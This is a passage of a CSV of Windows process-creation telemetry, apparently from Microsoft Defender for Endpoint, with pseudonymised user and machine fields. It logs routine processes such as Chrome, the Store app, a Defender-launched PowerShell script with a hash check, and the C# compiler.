00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:34.573006100+00:00,2021-06-23 03:01:46.748994800+00:00,034ffa80-60d2-4570-a59f-f7ae040f1401,computerpii_0a470890c60768167990033d701e7bd881398861,160243,True,10.7740.19041.1052,False,11540474045171838,,11540474045172880,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+380,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:58.425760400+00:00,12040,OpenWith.exe,OpenWith.exe -Embedding,PortableExecutable,2021-02-17 04:35:15.680695300+00:00,C:\Windows\System32\OpenWith.exe,123984,e4a834784fa08c17d47a1e72429c5109,f2db6838b734264fab79d24e5f96a21e6528073360a8daaa8d7efb8bc5d5edb4,29efbc22884147f29760e9a4d21758629fd6b507,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:58.691668700+00:00,2021-06-23 03:01:46.753982700+00:00,0579b6f4-410b-4163-a40c-eca889980e26,computerpii_0a470890c60768167990033d701e7bd881398861,160311,False,10.7740.19041.1052,False,11540474045136908,,11540474045172887,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,OpenWith,OpenWith.exe,Pick an app
+381,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:00:04.141711200+00:00,11476,WinStore.App.exe,"""WinStore.App.exe"" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca",PortableExecutable,2021-04-26 00:11:29.092373800+00:00,C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe,19968,57446e430eba7a8599b7033fe5645787,21933081c0e42748abb7054691ae798bb4c0afb08810e6ab1cab00215f5dffec,c95321b7cff2dfa12d28abbb09561070e6fe018e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:00:04.156100200+00:00,2021-06-23 03:01:46.754637+00:00,b5533faf-cc5f-4f5d-9442-07e942f260ed,computerpii_0a470890c60768167990033d701e7bd881398861,160317,False,10.7740.19041.1052,False,11540474045136908,,11540474045172890,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Windows Store,12104.1001.1.0,WinStore.App.exe,WinStore.App.exe,Store
+382,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:00:06.026759500+00:00,18392,coredpussvr.exe,coredpussvr.exe -Embedding,PortableExecutable,2021-02-17 04:35:08.219593600+00:00,C:\Windows\System32\coredpussvr.exe,50688,4569fad33bb3d0180fd593d29b3fc49c,7312ba6354a16f1547e5e56fd2880e21d6612d61a901ec1e5febf8004aac083e,ee93323bb8ecf49efc143c90d4e1ab6bb181953f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:00:06.049131900+00:00,2021-06-23 03:01:46.755185100+00:00,8d5da8ff-eede-4f82-8dd1-d16654a34eaa,computerpii_0a470890c60768167990033d701e7bd881398861,160324,False,10.7740.19041.1052,False,11540474045136908,,11540474045172896,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,coredpussvr.exe,coredpussvr.exe,coredpussvr.exe
+383,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:16.556703200+00:00,5540,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 02:55:16.210663100+00:00,19080,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4532"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:16.568930200+00:00,2021-06-23 03:01:46.760511800+00:00,bcda13e8-6471-4fed-a137-822cec9d7283,computerpii_0a470890c60768167990033d701e7bd881398861,160391,False,10.7740.19041.1052,False,11540474045172860,,11540474045172910,2021-06-23 02:55:16.210663100+00:00,19080,2021-06-23 02:55:16.210663100+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,19080,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+384,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:16.563500500+00:00,17152,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:01:16.556703200+00:00,5540,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:16.569296600+00:00,2021-06-23 03:01:46.760577600+00:00,0c82c5cf-a673-45cd-a36e-76bb55229d80,computerpii_0a470890c60768167990033d701e7bd881398861,160392,False,10.7740.19041.1052,False,11540474045172910,,11540474045172911,2021-06-23 03:01:16.556703200+00:00,5540,2021-06-23 03:01:16.556703200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5540,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+385,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:19.421436700+00:00,8616,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\5jxua5tr.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:01:16.556703200+00:00,5540,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:19.462013100+00:00,2021-06-23 03:01:46.762032+00:00,189a8128-e659-4cdb-9a19-40f190cdad97,computerpii_0a470890c60768167990033d701e7bd881398861,160413,False,10.7740.19041.1052,False,11540474045172910,,11540474045172912,2021-06-23 03:01:16.556703200+00:00,5540,2021-06-23 03:01:16.556703200+00:00,powershell.exe,5540,16640,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+386,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:19.510161800+00:00,18256,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_15549f783b5eed12528b05df367e3c1be9974ab3.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_2f916ab866e82c76a66a2eb357aef2fd247bd139.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:01:19.421436700+00:00,8616,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\5jxua5tr.cmdline""",True,2021-06-23 03:01:16.556703200+00:00,5540,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:19.620319100+00:00,2021-06-23 03:01:46.762308+00:00,0902dbdc-7204-43ef-94e9-4a740617a314,computerpii_0a470890c60768167990033d701e7bd881398861,160417,False,10.7740.19041.1052,False,11540474045172912,,11540474045172913,2021-06-23 03:01:19.421436700+00:00,8616,2021-06-23 03:01:19.421436700+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,8616,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18688,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+387,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:19.606185800+00:00,8168,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\og4gfl5v.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:01:16.556703200+00:00,5540,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '3a0bbacb5e49ec8cbd9055bf26cbbb0fec3f2c095bee682639e66b8c6a1acdf3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_d69d566e236b52ebad2e98b0e24986d45a8b4693.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:19.623969800+00:00,2021-06-23 03:01:46.762372700+00:00,0b25cb6c-b69a-49fd-8126-d67fb00fde5b,computerpii_0a470890c60768167990033d701e7bd881398861,160418,False,10.7740.19041.1052,False,11540474045172910,,11540474045172914,2021-06-23 03:01:16.556703200+00:00,5540,2021-06-23 03:01:16.556703200+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5540,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+388,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:01:19.668667700+00:00,2528,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_fe41e272f9bd9df3aaa651631becd6c6e5b9c7fe.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_3bc27ac1b17bd5055cb49829059d3e3a689ad650.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:01:19.606185800+00:00,8168,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\og4gfl5v.cmdline""",True,2021-06-23 03:01:16.556703200+00:00,5540,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:01:19.772829400+00:00,2021-06-23 03:01:46.762780600+00:00,d45f7e96-8fa5-4951-a1a7-b2b6874afe82,computerpii_0a470890c60768167990033d701e7bd881398861,160424,False,10.7740.19041.1052,False,11540474045172914,,11540474045172915,2021-06-23 03:01:19.606185800+00:00,8168,2021-06-23 03:01:19.606185800+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,8168,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+389,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:13:19.591611+00:00,8612,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320858_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320858 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 